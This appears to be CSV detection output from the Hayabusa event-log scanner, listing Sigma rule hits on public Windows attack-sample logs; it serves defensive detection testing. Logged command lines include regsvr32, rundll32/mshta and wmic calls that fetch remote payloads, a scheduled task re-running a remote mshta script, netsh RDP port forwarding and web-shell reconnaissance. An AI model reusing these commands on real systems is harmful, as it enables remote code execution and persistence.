+09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:18.833 +09:00,IEWIN7,7,high,In-memory PowerShell,,rules/sigma/image_load/sysmon_in_memory_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:50:36.858 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Execution - jscript9 engine invoked via clsid : Command: winpm.exe //e:{16d51579-a30b-4c8b-a276-0ff4dc41e755} winpm_update.js : Path: C:\ProgramData\winpm.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-19 02:51:14.254 +09:00,IEWIN7,1,informational,Process Creation,Command: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Regsvr32 
Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories : Command: attrib +h nbtscan.exe : Path: C:\Windows\System32\attrib.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx +2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,low,Hiding Files with Attrib.exe,,rules/sigma/process_creation/win_attrib_hiding_files.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx +2019-05-21 09:35:07.308 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" : Path: C:\Users\IEUser\Downloads\com-hijack.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.308 +09:00,IEWIN7,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.474 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c test.bat : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 
+2019-05-21 09:35:07.474 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c pause : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.518 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\cmd.exe /c test.bat",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.870 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.0.153744822\2027949517"" -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 956 gpu : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:08.279 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:08.728 
+09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:08.728 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.6.1176946839\1268428683"" -childID 1 -isForBrowser -prefsHandle 1844 -prefMapHandle 1836 -prefsLen 1 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 1680 tab : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:10.161 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.13.1464597065\1561502721"" -childID 2 -isForBrowser -prefsHandle 2432 -prefMapHandle 2436 -prefsLen 5401 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 2448 tab : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla 
Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:12.705 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.20.1502540827\1989220046"" -childID 3 -isForBrowser -prefsHandle 3032 -prefMapHandle 3056 -prefsLen 6207 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 3024 tab : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-22 00:32:57.286 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.286 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication 
"";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true);",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.867 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true);",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Suspicious MSHTA Process 
Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:59.769 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR ""mshta.exe https://hotelesms.com/Injection.txt"" /F : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:59.769 +09:00,IEWIN7,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:59.769 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 13:02:11.307 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:1600 CREDAT:275470 /prefetch:2",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_driveby_cve-2018-15982_sysmon_1_10.evtx +2019-05-24 01:49:05.736 +09:00,IEWIN7,1,informational,Process Creation,"Command: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:07.731 +09:00,IEWIN7,11,high,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:08.422 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:50:44.582 +09:00,IEWIN7,1,informational,Process Creation,Command: wmiadap.exe /F /T /R : Path: C:\Windows\System32\wbem\WMIADAP.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 02:26:08.716 +09:00,IEWIN7,1,informational,Process Creation,"Command: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat : Path: \\vboxsrv\HTools\msxsl.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx +2019-05-24 02:26:08.716 +09:00,IEWIN7,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx +2019-05-24 02:26:09.437 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx +2019-05-24 02:45:34.538 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-24 02:46:04.671 +09:00,IEWIN7,1,informational,Process Creation,"Command: netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5 : Path: C:\Windows\System32\netsh.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-24 02:46:04.671 +09:00,IEWIN7,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-24 02:46:04.671 +09:00,IEWIN7,1,high,Netsh RDP Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd_3389.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-24 10:33:53.112 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\windows\system32\cmd.exe"" /c net user : Path: C:\Windows\System32\cmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.112 +09:00,IEWIN7,1,high,Shells Spawned by Web Servers,,rules/sigma/process_creation/win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.122 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.182 +09:00,IEWIN7,1,informational,Process Creation,"Command: net user : Path: C:\Windows\System32\net.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""c:\windows\system32\cmd.exe"" /c net user",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.192 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\net1 user : Path: C:\Windows\System32\net1.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: net user,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-26 13:01:42.385 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" : Path: C:\Users\IEUser\Desktop\info.rar\jjs.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:42.966 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" : Path: C:\Users\IEUser\Desktop\info.rar\jjs.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:43.567 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\svchost.exe : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
""C:\Users\IEUser\Desktop\info.rar\jjs.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:43.567 +09:00,IEWIN7,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:43.567 +09:00,IEWIN7,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:43.567 +09:00,IEWIN7,1,critical,Suspect Svchost Activity,,rules/sigma/process_creation/win_susp_svchost_no_cli.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-27 00:47:56.667 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\System32\notepad.exe : Path: C:\Windows\System32\notepad.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipmb9da32d5-aa43-42fc-aeea-0cc226e10973 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:56.667 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:56.727 
+09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:57.628 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,Notepad Making 
